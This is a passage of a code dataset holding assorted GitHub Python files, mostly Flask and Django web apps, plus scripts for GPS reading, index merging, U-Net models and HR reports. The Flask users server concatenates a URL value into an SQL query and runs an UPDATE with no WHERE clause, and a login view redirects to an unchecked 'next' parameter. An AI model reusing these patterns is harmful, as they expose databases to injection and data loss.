\"POST\":\n db.session.delete(bookmark)\n db.session.commit()\n flash(f\" Deleted '{bookmark.description}'\")\n return redirect(url_for('user', username=current_user.username))\n else:\n flash(\"Please confirm deleting the bookmark.\")\n return render_template('confirm_delete.html', bookmark=bookmark, nolinks =True)\n\n \n@app.route('/user/')\n@login_required\ndef user(username):\n user = models.User.query.filter_by(username=username).first_or_404()\n \n return render_template('user.html', user=user)\n \n\n@app.route('/login', methods=[\"GET\", \"POST\"])\ndef login():\n form = forms.LoginForm()\n if form.validate_on_submit():\n #login and validate the user\n user = models.User.get_by_username((form.username.data))\n\n if user is not None and user.check_password(form.password.data):\n login_user(user, form.remember_me.data)\n flash(\"Logged in successfylly as {}\".format(user.username))\n return redirect(request.args.get(\"next\") or url_for('user', username=user.username))\n flash(\"Incorrect username or password\")\n return render_template(\"login.html\", form=form)\n\n\n\n@app.route('/logout')\ndef logout():\n logout_user()\n return redirect(url_for('index'))\n\n@app.route('/signup', methods=[\"GET\", \"POST\"])\ndef signup():\n form = forms.SignupForm()\n if form.validate_on_submit():\n user = models.User(email=form.email.data,\n username=form.username.data,\n password=form.password.data)\n db.session.add(user)\n db.session.commit()\n flash(f'Welcome, {user.username}! Please login.')\n return redirect(url_for('login'))\n return render_template('signup.html', form=form)\n\n@app.route('/tag/')\ndef tag(name):\n tag = models.Tag.query.filter_by(name=name).first_or_404()\n return render_template('tag.html', tag=tag)\n\n\n@app.errorhandler(403)\ndef forbidden(e):\n return render_template('403.html'), 403\n\n\n@app.errorhandler(404)\ndef page_not_found(e):\n return render_template('404.html'), 404\n\n\n@app.errorhandler(500)\ndef internal_server_error(e):\n return render_template('500.html'),500\n\n@app.context_processor\ndef inject_tags():\n return dict(all_tags=models.Tag.all)\n\n # if request.method == 'POST':\n # url = request.form['url']\n # store_bookmarks(url)\n # # app.logger.debug('Stored url: ' + url)\n # flash(\"Stored bookmark: '{}'\".format(url))\n # # print(bookmarks)\n # return redirect (url_for('index'))\n # return render_template('add.html')\n\n\n\n\n\n\n","repo_name":"1Jayso/bookmarking-app","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4935,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"55"} +{"seq_id":"2865370573","text":"from flask import Flask, render_template, request, redirect\nfrom mysqlconnection import connectToMySQL\n\napp = Flask(__name__)\n\n@app.route(\"/users\")\ndef index():\n db = connectToMySQL(\"users\")\n all_users = db.query_db(\"SELECT * FROM friends;\") \n print(all_users)\n return render_template(\"users.html\", users = all_users)\n\n\n@app.route(\"/users/form\")\ndef new():\n return render_template(\"newuser.html\")\n\n@app.route(\"/users/new\", methods = ['POST'])\ndef create():\n db = connectToMySQL(\"users\")\n \n query = \"INSERT INTO friends(first_name,last_name, email) VALUES (%(fname)s, %(lname)s, %(email)s);\"\n data = {\n 'fname': request.form[\"fname\"],\n 'lname': request.form[\"lname\"],\n 'email': request.form[\"email\"],\n }\n new_user_id = db.query_db(query, data)\n print(new_user_id)\n return redirect(\"/users/\")\n\n\n@app.route(\"/users/\")\ndef user(id):\n print(\"**************\")\n db = connectToMySQL(\"users\")\n user = db.query_db('SELECT * FROM friends WHERE id =' +id+';')\n print(user)\n return render_template(\"id.html\", user = user)\n\n@app.route(\"/users//edit\")\ndef edit():\n return render_template(\"edit.html\")\n\n@app.route(\"/users//update\")\ndef update():\n db = connectToMySQL(\"users\")\n \n query = 'UPDATE friends SET first_name = %(fname)s, last_name = %(lname)s, email = %(email)s;'\n data = {\n 'fname': request.form[\"fname\"],\n 'lname': request.form[\"lname\"],\n 'email': request.form[\"email\"],\n }\n new_user_id = db.query_db(query, data)\n print(new_user_id)\n return redirect(\"/users/\")\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"chizakirov/flask","sub_path":"flask_mysql/users/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"73708064490","text":"import serial\nimport pynmea2\n\n\nclass GPSSensor:\n SERIAL_BAUDRATE = 9600\n SERIAL_PORT = '/dev/serial0'\n\n def __init__(self):\n self.ser = serial.Serial(self.SERIAL_PORT, self.SERIAL_BAUDRATE)\n print('Initialized serial interface for GPS Sensor')\n self.shouldIRun = True\n self.gps = None\n\n def start_measurement(self):\n # self.ser.open()\n while self.shouldIRun:\n data = self.ser.readline().decode('ascii')\n if data[0:6] == '$GPGGA':\n self.gps = pynmea2.parse(data)\n\n def get_gps(self):\n return self.gps\n\n def stop(self):\n self.shouldIRun = False\n self.ser.close()\n print('Closed serial interface for GPS Sensor')\n\n\n# Serial GPS Sensor Test: Expect the coordinates and altitude provided by the sensor\n# import _thread\n# import time\n#\n# if __name__ == \"__main__\":\n# try:\n# dut = GPSSensor()\n# _thread.start_new_thread(dut.start_measurement, ())\n# while True:\n# time.sleep(1)\n# gps = dut.get_gps()\n# print('lat=' + str(gps.latitude) + str(gps.lat_dir) + ' lon=' + str(gps.longitude) + str(\n# gps.lon_dir) + ' altitude=' + str(gps.altitude) + str(gps.altitude_units))\n#\n#\n# finally:\n# dut.stop()\n","repo_name":"dnutiu/BLECar","sub_path":"BLECarPiZeroW/dbusObjects/drivers/GPSSensor.py","file_name":"GPSSensor.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"55"} +{"seq_id":"30590536144","text":"\n'''\n *\n * Name : F21MP- Open Domain Question Answering (ODQA) Agent.\n *\n * Description : This class illustrates the process of creating a final index.\n *\n *\n Indexing formate: jonny-2314:t3b6i2r1;6432:t5c8b3i1;\n Ex.:- johnny-2141:5;1232:1;5432:78;\n 'Johnny-563-1-3-4--2-4-6-'.split('-') ---> ['apple', '563', '1', '3', '4', '', '2', '4', '6', '']\n *\n * Author : Shreyas Arunesh\n *\n *\n * Reference : https://github.com/neufang/wiki-Dump-Indexing/blob/master/buildInvertedIndexFromWikiDump.py\n'''\nimport os\nfrom collections import defaultdict\n\nindex_map = defaultdict(str)\nnum_files = 0\nnum_pages = 0\nid_title_map = {}\n\n\nclass MergeFiles():\n\n \"\"\"\n *\n * Summary : This class takes the intermediate files as input, merges the data and write the index to final files.\n This class uses CreateIndex() under the hood.\n Ex - intermediate index ----> final index\n *\n *\n Args: num_itermed_files, write_data\n *\n \"\"\"\n\n def __init__(self, num_itermed_files, write_data):\n\n self.num_itermed_files = num_itermed_files\n self.write_data = write_data\n\n '''\n *\n * Summary : This function merges the intermediate index to create the final index. \n The intermediate and initial files are deleted at the end of this process. \n *\n * Args : Param - intermediate files and write data class \n *\n * Returns : Creates the final index.\n *\n '''\n def merge_files(self):\n\n files_data = {}\n line = {}\n postings = {}\n is_file_empty = {i: 1 for i in range(self.num_itermed_files)}\n tokens = []\n\n i = 0\n while i < self.num_itermed_files:\n\n files_data[i] = open(f'../Dataset/output_data/english_wiki_index/index_{i}.txt', 'r', encoding= 'UTF-8')\n line[i] = files_data[i].readline().strip('\\n')\n postings[i] = line[i].split('-')\n is_file_empty[i] = 0\n new_token = postings[i][0]\n if new_token not in tokens:\n tokens.append(new_token)\n i += 1\n\n tokens.sort(reverse=True)\n num_processed_postings = 0\n data_to_merge = defaultdict(str)\n num_files_final = 0\n\n while sum(is_file_empty.values()) != self.num_itermed_files:\n\n token = tokens.pop()\n num_processed_postings += 1\n\n if num_processed_postings % 30000 == 0:\n num_files_final = self.write_data.write_final_files(data_to_merge, num_files_final)\n\n data_to_merge = defaultdict(str)\n\n i = 0\n while i < self.num_itermed_files:\n\n if is_file_empty[i] == 0:\n\n if token == postings[i][0]:\n\n line[i] = files_data[i].readline().strip('\\n')\n data_to_merge[token] += postings[i][1]\n\n if len(line[i]):\n postings[i] = line[i].split('-')\n new_token = postings[i][0]\n\n if new_token not in tokens:\n tokens.append(new_token)\n tokens.sort(reverse=True)\n\n else:\n is_file_empty[i] = 1\n files_data[i].close()\n print(f'Removing file {str(i)}')\n os.remove(f'../Dataset/output_data/english_wiki_index/index_{str(i)}.txt')\n i += 1\n\n num_files_final = self.write_data.write_final_files(data_to_merge, num_files_final)\n\n return num_files_final\n","repo_name":"shreyasarunesh/OpenDomainQA","sub_path":"Retriever/WikiIndexing/MergeFiles.py","file_name":"MergeFiles.py","file_ext":"py","file_size_in_byte":3803,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"55"} +{"seq_id":"19006034940","text":"# _*_coding:utf-8_*_\n# @Author :hd\n# @time :2023/2/20 15:57\n# @filename :traceback_test.py\n# 开发工具 :PyCharm\nimport traceback\ntry:\n age=int(input(\"请输入:\"))\n score=int(input(\"请输入:\"))\n s=age/score\nexcept :\n traceback.print_exc()\nelse:\n print(s)\nfinally:\n print(\"over\")\nprint(\"结束了\")","repo_name":"hd19940924/Python_study","sub_path":"traceback_test.py","file_name":"traceback_test.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"2155805065","text":"from django.shortcuts import render, get_object_or_404, reverse, redirect\nfrom django.views.generic import ListView, View, UpdateView, DeleteView, FormView\nfrom django.http import HttpResponseRedirect\nfrom .models import Post\nfrom .forms import CommentForm, PostForm, ContactForm\nfrom django.contrib import messages\n\n\n# Create your views here.\nclass PostList(ListView):\n model = Post\n queryset = Post.objects.filter(status=1).order_by('-created_date')\n template_name = 'index.html'\n paginate_by = 6\n\n\nclass PostDetail(View):\n\n def get(self, request, slug, *args, **kwargs):\n queryset = Post.objects.filter(status=1)\n post = get_object_or_404(queryset, slug=slug)\n comments = post.comments.filter(approved=True).order_by('created_date')\n liked = False\n if post.likes.filter(id=self.request.user.id).exists():\n liked = True\n\n return render(\n request,\n 'post_detail.html',\n {\n 'post': post,\n 'comments': comments,\n 'commented': False,\n 'liked': liked,\n 'comment_form': CommentForm()\n },\n )\n\n def post(self, request, slug, *args, **kwargs):\n queryset = Post.objects.filter(status=1)\n post = get_object_or_404(queryset, slug=slug)\n comments = post.comments.filter(approved=True).order_by('created_date')\n liked = False\n if post.likes.filter(id=self.request.user.id).exists():\n liked = True\n\n comment_form = CommentForm(data=request.POST)\n\n if comment_form.is_valid():\n comment_form.instance.email = request.user.email\n comment_form.instance.name = request.user.username\n comment = comment_form.save(commit=False)\n comment.post = post\n comment.save()\n\n return render(\n request,\n 'post_detail.html',\n {\n 'post': post,\n 'comments': comments,\n 'commented': True,\n 'liked': liked,\n 'comment_form': CommentForm()\n },\n )\n\n\nclass PostLike(View):\n\n def post(self, request, slug):\n post = get_object_or_404(Post, slug=slug)\n\n if post.likes.filter(id=request.user.id).exists():\n post.likes.remove(request.user)\n else:\n post.likes.add(request.user)\n\n return HttpResponseRedirect(reverse('post_detail', args=[slug]))\n\n\nclass AddPost(View):\n\n def get(self, request):\n context = {'form': PostForm()}\n return render(request, 'add_post.html', context)\n\n def post(self, request):\n\n if request.method == 'POST':\n form = PostForm(request.POST, initial={\n 'author': request.user.username\n })\n if form.is_valid():\n form.instance.email = request.user.email\n form.instance.name = request.user.username\n form.instance.author = self.request.user\n form.save()\n messages.success(request, 'Your post is awaiting approval.')\n return redirect('home')\n else:\n messages.error(\n request, 'Error: Something went wrong, please try again.')\n context = {'form': form}\n return render(request, 'add_post.html', context)\n else:\n form = PostForm()\n\n context = {'form': form}\n return render(request, 'index.html', context)\n\n\nclass UpdatePost(UpdateView):\n\n model = Post\n template_name = 'update_post.html'\n fields = ['title', 'content', 'excerpt', 'featured_image']\n\n\nclass DeletePost(DeleteView):\n\n model = Post\n template_name = 'delete_post.html'\n success_url = '/'\n\n\nclass BlogPosts(ListView):\n\n model = Post\n queryset = Post.objects.filter(status=1).order_by('-created_date')\n template_name = 'blog_posts.html'\n paginate_by = 6\n\n\nclass Contact(FormView):\n\n template_name = 'contact_us.html'\n form_class = ContactForm\n success_url = '/'\n\n def post(self, request):\n if request.method == 'POST':\n form = ContactForm(request.POST)\n if form.is_valid():\n form.save()\n messages.success(request, 'Thank you! Your message has been sent.')\n return redirect('home')\n else:\n messages.error(request, 'This is not a valid form')\n return redirect('home')\n","repo_name":"conor-b1995/p4-GAAStories","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"768690365","text":"\"\"\"A modified version of `Unet` class from `segmentation_models`\"\"\"\nfrom keras.models import Model\nfrom keras.layers import Conv2D, Activation\nfrom segmentation_models.utils import (\n get_layer_number, to_tuple, freeze_model, legacy_support)\nfrom segmentation_models.backbones import get_backbone, get_feature_layers\nfrom segmentation_models.unet.blocks import Transpose2D_block, Upsample2D_block\n\n\ndef build_unet(backbone, classes, skip_connection_layers,\n decoder_filters=(256,128,64,32,16),\n upsample_rates=(2,2,2,2,2),\n n_upsample_blocks=5,\n block_type='upsampling',\n activation='sigmoid',\n use_batchnorm=True):\n\n input = backbone.input\n x = backbone.output\n\n if block_type == 'transpose':\n up_block = Transpose2D_block\n else:\n up_block = Upsample2D_block\n\n # convert layer names to indices\n skip_connection_idx = ([get_layer_number(backbone, l) if isinstance(l, str) else l\n for l in skip_connection_layers])\n\n for i in range(n_upsample_blocks):\n\n # check if there is a skip connection\n skip_connection = None\n if i < len(skip_connection_idx):\n skip_connection = backbone.layers[skip_connection_idx[i]].output\n\n upsample_rate = to_tuple(upsample_rates[i])\n\n x = up_block(decoder_filters[i], i, upsample_rate=upsample_rate,\n skip=skip_connection, use_batchnorm=use_batchnorm)(x)\n\n x = Conv2D(classes, (3,3), padding='same', name='final_conv')(x)\n if isinstance(activation, str):\n x = Activation(activation, name=activation)(x)\n else:\n x = activation(x)\n\n model = Model(input, x)\n\n return model\n\n\nold_args_map = {\n 'freeze_encoder': 'encoder_freeze',\n 'skip_connections': 'encoder_features',\n 'upsample_rates': None, # removed\n 'input_tensor': None, # removed\n}\n\n\n@legacy_support(old_args_map)\ndef Unet(backbone_name='vgg16',\n input_shape=(None, None, 3),\n classes=1,\n activation='sigmoid',\n encoder_weights='imagenet',\n encoder_freeze=False,\n encoder_features='default',\n decoder_block_type='upsampling',\n decoder_filters=(256, 128, 64, 32, 16),\n decoder_use_batchnorm=True,\n **kwargs):\n \"\"\" Unet_ is a fully convolution neural network for image semantic segmentation\n\n Args:\n backbone_name: name of classification model (without last dense layers) used as feature\n extractor to build segmentation model.\n input_shape: shape of input data/image ``(H, W, C)``, in general\n case you do not need to set ``H`` and ``W`` shapes, just pass ``(None, None, C)`` to make your model be\n able to process images af any size, but ``H`` and ``W`` of input images should be divisible by factor ``32``.\n classes: a number of classes for output (output shape - ``(h, w, classes)``).\n activation: name of one of ``keras.activations`` for last model layer\n (e.g. ``sigmoid``, ``softmax``, ``linear``).\n encoder_weights: one of ``None`` (random initialization), ``imagenet`` (pre-training on ImageNet).\n encoder_freeze: if ``True`` set all layers of encoder (backbone model) as non-trainable.\n encoder_features: a list of layer numbers or names starting from top of the model.\n Each of these layers will be concatenated with corresponding decoder block. If ``default`` is used\n layer names are taken from ``DEFAULT_SKIP_CONNECTIONS``.\n decoder_block_type: one of blocks with following layers structure:\n\n - `upsampling`: ``Upsampling2D`` -> ``Conv2D`` -> ``Conv2D``\n - `transpose`: ``Transpose2D`` -> ``Conv2D``\n\n decoder_filters: list of numbers of ``Conv2D`` layer filters in decoder blocks\n decoder_use_batchnorm: if ``True``, ``BatchNormalisation`` layer between ``Conv2D`` and ``Activation`` layers\n is used.\n\n Returns:\n ``keras.models.Model``: **Unet**\n\n .. _Unet:\n https://arxiv.org/pdf/1505.04597\n\n \"\"\"\n\n backbone = get_backbone(backbone_name,\n input_shape=input_shape,\n input_tensor=None,\n weights=encoder_weights,\n include_top=False)\n\n if encoder_features == 'default':\n encoder_features = get_feature_layers(backbone_name, n=4)\n\n model = build_unet(backbone,\n classes,\n encoder_features,\n decoder_filters=decoder_filters,\n block_type=decoder_block_type,\n activation=activation,\n n_upsample_blocks=len(decoder_filters),\n upsample_rates=(2, 2, 2, 2, 2),\n use_batchnorm=decoder_use_batchnorm)\n\n # lock encoder weights for fine-tuning\n if encoder_freeze:\n freeze_model(backbone)\n\n model.name = 'u-{}'.format(backbone_name)\n\n return model\n\n\n\n","repo_name":"mathandy/andnn","sub_path":"segmentation/unet/unet_with_channelwise_softmax.py","file_name":"unet_with_channelwise_softmax.py","file_ext":"py","file_size_in_byte":5189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"34729275931","text":"from dataclasses import fields\nfrom pkgutil import get_data\nfrom tracemalloc import start\nimport frappe\nfrom frappe import utils\nfrom frappe.utils import cstr, cint, getdate, add_to_date\nfrom frappe import msgprint, _\nfrom calendar import monthrange\nfrom datetime import datetime, timedelta\nimport calendar\nfrom erpnext.hr.doctype.holiday_list.holiday_list import is_holiday\n\n\ndef execute(filters=None):\n\n columns = [\n {\n \"fieldname\": \"employee\",\n \"label\": _(\"Employee\"),\n \"fieldtype\": \"Link\",\n \"options\": \"Employee\",\n },\n {\n \"fieldname\": \"employee_name\",\n \"label\": _(\"Employee Name\"),\n \"fieldtype\": \"Data\",\n \"fetch_from\": \"employee.employee_name\",\n },\n {\n \"fieldname\": \"full_time\",\n \"label\": _(\"Full Time\"),\n \"fieldtype\": \"Data\",\n },\n {\n \"fieldname\": \"employee_time\",\n \"label\": _(\"Employee Time\"),\n \"fieldtype\": \"Data\",\n },\n {\n \"fieldname\": \"precentage_time\",\n \"label\": _(\"Precentage Employee Time\"),\n \"fieldtype\": \"Percent\",\n },\n ]\n data = []\n filters_t = {'status': 'Active'}\n if filters.employee:\n filters_t = {'name': filters.employee}\n\n employees = frappe.db.get_list(\n \"Employee\", fields=['name', 'default_shift', 'employee_name', 'holiday_list'], filters=filters_t)\n for i in employees:\n if i.default_shift and i.holiday_list:\n sh = get_shift_time(i.default_shift)\n employee_data = get_employee_checkin_by_shift(\n i.name, sh, filters.from_date, filters.to_date, i, filters.is_calc_spesfic_hour)\n data.append(employee_data)\n else:\n data.append(\n {\n \"employee\": i.name,\n \"employee_name\": i.employee_name,\n \"full_time\": 0,\n \"employee_time\": 0,\n \"precentage_time\": 0}\n\n )\n\n return columns, data\n\n\ndef get_shift_time(shif_type):\n return frappe.db.sql(\"\"\"\n\tselect working_hour_per_month, start_time, end_time, working_hours_per_day from `tabShift Type` where name = '%s'\n\t\"\"\" % (shif_type))\n\n\ndef get_employee_checkin_by_shift(employee_name, shift_details, start_date, end_date, employee, is_calc_real=False):\n emloyee_data = {}\n\n d = datetime.now()\n # h = monthrange(d.year, month_map[month])\n start_date = start_date\n end_date = end_date\n employee_check_in = frappe.db.get_list('Employee Checkin', filters={'employee': employee_name, 'time': [\n 'between', (start_date.date(), end_date.date())]}, fields=['name', 'time'], order_by='time')\n for i in employee_check_in:\n if i.time.date() in emloyee_data:\n if 'in' in emloyee_data[i.time.date()]:\n if i.time < emloyee_data[i.time.date()]['in']:\n emloyee_data[i.time.date()]['in'] = i.time\n else:\n emloyee_data[i.time.date()]['in'] = i.time\n\n if 'out' in emloyee_data[i.time.date()]:\n if i.time > emloyee_data[i.time.date()]['out']:\n emloyee_data[i.time.date()]['out'] = i.time\n else:\n emloyee_data[i.time.date()]['out'] = i.time\n else:\n emloyee_data[i.time.date()] = {\n 'in': i.time,\n 'out': i.time\n }\n d = process_data_used_shift(emloyee_data, shift_details)\n if d:\n c, y = calculate_employee_time(d, True, employee, shift_details)\n full_time = shift_details[0][0]\n if is_calc_real:\n full_time = calculate_real_hours(start_date, end_date, shift_details[0][3], employee.holiday_list)\n\n \n percent = 0\n if (c != 0) and (full_time != 0):\n percent = (c/full_time) * 100\n data = {\n \"employee\": employee.name,\n \"employee_name\": employee.employee_name,\n \"full_time\": full_time,\n \"employee_time\": c,\n \"precentage_time\": percent}\n return data\n else:\n data = {\n \"employee\": employee.name,\n \"employee_name\": employee.employee_name,\n \"full_time\": 0,\n \"employee_time\": 0,\n \"precentage_time\": 0}\n return data\n\n\ndef process_data_used_shift(data, shift_details):\n\n new_data = data\n start_hour, start_minute = get_hours_from_shift(shift_details, 1)\n end_hour, end_minute = get_hours_from_shift(shift_details, 2)\n if not start_hour:\n return\n if not start_minute:\n return\n for k in new_data:\n start_time = new_data[k]['in'].replace(\n hour=start_hour, minute=start_minute, second=0)\n end_time = new_data[k]['out'].replace(hour=end_hour, minute=end_minute, second=0)\n if new_data[k]['in'] < start_time:\n\n new_data[k]['in'] = start_time\n if new_data[k]['out'] > end_time:\n new_data[k]['out'] = end_time\n return new_data\n\n\ndef get_hours_from_shift(shift_details, key):\n try:\n return shift_details[0][key].seconds//3600, (shift_details[0][key].seconds//60) % 60\n except:\n return None, None\n\n\ndef calculate_employee_time(data, with_holidays=True, employee=None, shift_data=None):\n total_hours = 0\n employee_hours = 0\n for k in data:\n hour_per_day = data[k]['out'] - data[k]['in']\n minute = (hour_per_day.total_seconds()//60) % 60\n if hour_per_day.total_seconds() // 3600 > 0:\n if not is_holiday(employee.holiday_list, data[k]['out'].date()):\n tot_h = hour_per_day.total_seconds() / 3600\n employee_hours = employee_hours + shift_data[0][3]\n if tot_h <= shift_data[0][3]:\n total_hours = total_hours + tot_h\n else:\n total_hours = total_hours + shift_data[0][3]\n return total_hours, employee_hours\n\ndef calculate_real_hours(start_date, end_date, day_work_hours, holiday_list):\n total_hours = 0\n days = date_range(start_date, end_date)\n for i in days:\n if not is_holiday(holiday_list, i):\n total_hours = total_hours + day_work_hours\n return total_hours\n\n\n\n\n\n\ndef date_range(start, end):\n delta = end - start # as timedelta\n days = [start + timedelta(days=i) for i in range(delta.days + 1)]\n return days\n\nmonth_map = {\n \"Jan\": 1,\n \"Feb\": 2,\n \"Mar\": 3,\n \"Apr\": 4,\n \"May\": 5,\n \"Jun\": 6,\n \"Jul\": 7,\n \"Aug\": 8,\n \"Sep\": 9,\n \"Oct\": 10,\n \"Nov\": 11,\n \"Dec\": 12,\n}\n","repo_name":"morghim/hr_report","sub_path":"hr_report/hr_report/report/percentage_of_employee_time/percentage_of_employee_time.py","file_name":"percentage_of_employee_time.py","file_ext":"py","file_size_in_byte":6686,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"55"} +{"seq_id":"26610089406","text":"#!/usr/bin/python3\n\nimport youtube_dl\nimport sys, os\nfrom tkinter import *\nimport tkinter.messagebox as tmb\ntry:\n import pyperclip\nexcept ModuleNotFoundError:\n paste_event = False\nelse:\n paste_event = True\n\nroot = Tk()\nroot.title(\"[Gemate Gtk]\")\n\nmenu_bar = Menu(root)\npas = None\n\n#variables\npastes = StringVar()\nticked = IntVar()\n\n#commands and callbacks\ndef download():\n print(ticked.get())\n url = pastes.get()\n ydl_opts={}\n if not url:\n tmb.showwarning(title=\"NO URL\", message=\"Please Provide A URL\")\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n ydl.download([url])\n \ndef manual():\n man_text = \"A Tool for downloading Youtube videos and audios, and also from other sites as well. Just copy the url of the video and paste it, Choose your file format then hit download\"\n tmb.showinfo(title=\"Manual\", message=man_text)\n\ndef paste():\n if paste_event:\n past = pyperclip.paste()\n pastes.set(past)\ndef show_popup(event):\n popup.tk_popup(event.x_root, event.y_root)\n\nfile = Menu(menu_bar, tearoff=0)\nfiles = menu_bar.add_cascade(label=\"File\", menu=file)\nfile.add_command(label=\"New\", accelerator=\"Ctrl+N\", underline=0)\n\nabout = Menu(menu_bar, tearoff=0)\nabouts = menu_bar.add_cascade(label=\"About\", menu=about)\nabout.add_command(label=\"About\")\n\nhelps = Menu(menu_bar, tearoff=0)\nmenu_bar.add_cascade(label=\"Help\", menu=helps)\nhelps.add_command(label=\"Manpage\", command=manual, accelerator='F1')\n\nextra = Menu(menu_bar, tearoff=0)\nmenu_bar.add_cascade(label='Extras', menu=extra)\nextra.add_command(label=\"Supported Sites\")\n\n\nLabel(root, text=\"Tool for downloading Videos\", font='{nimbus roman} 20 bold italic', foreground='light sea green').grid(row=1, column=1)\n\nent=Entry(root, width=40, textvariable=pastes).grid(row=3, column=1, sticky='w')\nLabel(root, text=\"Enter the Video url:\").grid(row=3, column=0, sticky='w')\nRadiobutton(root, variable=ticked, value=1).grid(row=6, column=0,sticky='e')\nRadiobutton(root, variable=ticked, value=2).grid(row=5, column=0,sticky='e')\nButton(root, text='Download', command=download).grid(row=7, column=2)\nLabel(root, text='mp3/audio').grid(row=5, column=1, sticky='w')\nLabel(root, text='mp4/video').grid(row=6, column=1, sticky='w')\n\nticked.set(2)\n\npopup = Menu(ent)\npopup.add_command(label='paste', underline=0, command=paste)\n\npaste()\n#ent.bind('', show_popup, add=None)\nroot.bind_all('', download)\n\nroot.config(menu=menu_bar)\nmainloop()\n","repo_name":"ChromeGenesis/Gemate-Gtk","sub_path":"gemate_gtk.py","file_name":"gemate_gtk.py","file_ext":"py","file_size_in_byte":2459,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"55"} +{"seq_id":"17152409865","text":"\"\"\"\nconstants.py contains constant values used throughout the 'friends' app.\n\"\"\"\nfrom access_token import *\n\n# Constants\nMAXIMUM_RESULTS_PER_QUERY = 5000\nSAFE_RESULTS_PER_QUERY = 1000\n\n# FQL Queries\nUSER_QUERY = 'SELECT uid, name FROM user WHERE uid=me()'\nFRIENDS_QUERY = 'SELECT uid, name, mutual_friend_count FROM user WHERE uid IN (SELECT uid2 FROM friend WHERE uid1 = me())'\n\nFRIENDSHIPS_BETWEEN_FRIENDS_AND_PEOPLE_QUERY = lambda friend_IDs: 'SELECT uid1, uid2 FROM friend WHERE uid1 IN (' + ','.join(friend_IDs) + ') AND uid2 in (SELECT uid2 FROM friend WHERE uid1=me())'\nFRIEND_COUNT_PER_FRIENDSHIP_QUERY = lambda number_of_friends, graph_density: int(SAFE_RESULTS_PER_QUERY / graph_density / number_of_friends)","repo_name":"jimmyjwu/social_circles","sub_path":"friends/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"5012937393","text":"import numpy as np\nfrom scipy.special import softmax\nimport torch\nfrom torch.utils.data import TensorDataset\n\nfrom tta.datasets import MultipleDomainDataset\n\n\nclass MultipleDomainCXR(MultipleDomainDataset):\n\n def build(self, generator, datastore, labels, Y_col, Z_col, patient_col, target_domain_count, source_domain_count):\n # Pathology: 0 = Negative, 1 = Positive\n # GENDER: 0 = Female, 1 = Male\n labels[\"M\"] = 2 * labels[Y_col] + labels[Z_col]\n print(f\"histogram({Y_col}, {Z_col}) =\", labels[\"M\"].value_counts().sort_index().values)\n\n marginal_Y = labels[Y_col].value_counts(normalize=True).sort_index().values\n marginal_Z = labels[Z_col].value_counts(normalize=True).sort_index().values\n print(\"marginal_Y\", marginal_Y)\n print(\"marginal_Z\", marginal_Z)\n\n # joint distribution of Y and Z\n p_11_min = max(0, marginal_Y[1] + marginal_Z[1] - 1)\n p_11_max = min(marginal_Y[1], marginal_Z[1])\n anchor1 = np.array([\n [1 - marginal_Y[1] - marginal_Z[1] + p_11_min, marginal_Z[1]-p_11_min ],\n [marginal_Y[1] - p_11_min, p_11_min ]\n ])\n anchor2 = np.array([\n [1 - marginal_Y[1] - marginal_Z[1] + p_11_max, marginal_Z[1]-p_11_max ],\n [marginal_Y[1] - p_11_max, p_11_max ]\n ])\n print(\"anchor1\", anchor1)\n print(\"anchor2\", anchor2)\n\n mask = np.ones(len(labels.index), dtype=bool)\n domains = [None for _ in self.confounder_strength]\n\n # Sample source domains\n for i, strength in enumerate(self.confounder_strength):\n if i != self.train_domain:\n continue\n\n quota = labels[\"M\"].loc[mask].value_counts().sort_index().values - target_domain_count\n quota = torch.from_numpy(quota)\n joint_M = torch.from_numpy(strength * anchor1 + (1-strength) * anchor2)\n\n source_domain_count_max = torch.floor(torch.min(quota/joint_M.flatten())).item()\n if source_domain_count is None:\n source_domain_count = source_domain_count_max\n elif source_domain_count > source_domain_count_max:\n raise ValueError(f\"Insufficient samples for the source domain: {source_domain_count} > {source_domain_count_max}\")\n\n count = torch.round(source_domain_count * joint_M).long()\n count = self.fix_count(count, source_domain_count)\n count_flatten = torch.flatten(count)\n assert torch.all(count_flatten <= quota), f\"Insufficient samples for the source domain: {count_flatten} > {quota}\"\n\n joint_M = count / torch.sum(count)\n\n print(f\"histogram(M) = {count.flatten()}\")\n reservation = np.ceil(target_domain_count * np.maximum(anchor1, anchor2).flatten())\n domain, in_sample_patients = self.sample(generator, datastore, labels, Y_col, Z_col, patient_col, mask, count, reservation)\n mask &= ~labels[patient_col].isin(in_sample_patients)\n domains[i] = (domain, joint_M)\n\n remainder = np.sum(mask)\n if remainder < target_domain_count:\n raise ValueError(f\"Not enough data for target domains: {remainder} < {target_domain_count}\")\n\n # Sample target domains\n for i, strength in enumerate(self.confounder_strength):\n if i == self.train_domain:\n continue\n\n joint_M = torch.from_numpy(strength * anchor1 + (1-strength) * anchor2)\n count = torch.round(target_domain_count * joint_M).long()\n count = self.fix_count(count, target_domain_count)\n joint_M = count / torch.sum(count)\n\n print(f\"histogram(M) = {count.flatten()}\")\n domain, _ = self.sample(generator, datastore, labels, Y_col, Z_col, patient_col, mask, count, None)\n domains[i] = (domain, joint_M)\n\n return domains\n\n\n def fix_count(self, count, domain_count):\n count = torch.flatten(count)\n\n l1, l2, l3 = torch.topk(count, 3).indices\n if torch.sum(count) > domain_count:\n count[l1] -= 1\n if torch.sum(count) > domain_count:\n count[l2] -= 1\n if torch.sum(count) > domain_count:\n count[l3] -= 1\n\n s1, s2, s3 = 